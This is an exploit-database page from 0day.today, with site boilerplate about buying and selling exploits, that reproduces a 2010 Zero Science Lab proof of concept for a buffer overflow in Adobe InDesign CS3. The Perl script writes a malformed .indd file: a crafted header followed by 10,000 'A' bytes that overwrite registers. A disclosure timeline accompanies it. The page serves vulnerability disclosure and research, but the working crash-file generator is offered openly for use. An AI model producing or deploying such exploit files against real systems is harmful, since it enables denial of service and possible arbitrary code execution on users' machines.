0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability
[=================================================================== Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability =================================================================== #!/usr/bin/perl # # Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability # # Vendor: Adobe Systems Inc. # # Product Web Page: http://www.adobe.com # # Version tested: CS3 10.0 # # Summary: Adobe® InDesign® CS3 software provides precise control over # typography and built-in creative tools for designing, preflighting, # and publishing documents for print, online, or to mobile devices. Include # interactivity, animation, video, and sound in page layouts to fully engage # readers. # # Desc: When parsing .indd files to the application, it crashes instantly # overwriting memory registers. Depending on the offset, EBP, EDI, EDX and # ESI gets overwritten. Pottential vulnerability use is arbitrary code execution # and denial of service. # # # Tested on Microsoft Windows XP Professional SP3 (English) # # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # liquidworm gmail com # # Zero Science Lab - http://www.zeroscience.mk # # 16.09.2009 # # # # Vendor status: # # [16.09.2009] Vulnerability discovered. # [09.03.2010] Vulnerability reported to vendor with sent PoC files. # [21.03.2010] Asked confirmation from the vendor. # [21.03.2010] Vendor asked for PoC files due to communication errors. # [22.03.2010] Re-sent PoC files to vendor. # [04.04.2010] Vendor confirms vulnerability. # [03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out. # [04.06.2010] Public advisory released. # # # Zero Science Lab Advisory ID: ZSL-2010-4941 # Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4941.php # # # # Raw PoC code: # $header = "\x06\x06\xED\xF5\xD8\x1D\x46\xE5\xBD\x31\xEF\xE7\xFE\x74\xB7\x1D\x44\x4F\x43\x55\x4D\x45\x4E\x54\x01"; $fn = "teppei.indd"; $bof = "\x41" x 10000; print "\n\n[*] Creating PoC file: $fn ...\r\n"; sleep(1); open(indd, ">./$fn") || die "\n\aCannot open $fn : $!"; print indd "$header" . "$bof"; close (indd); print "\n[*] PoC file successfully created!\r\n"; # 0day.today [2024-11-14] #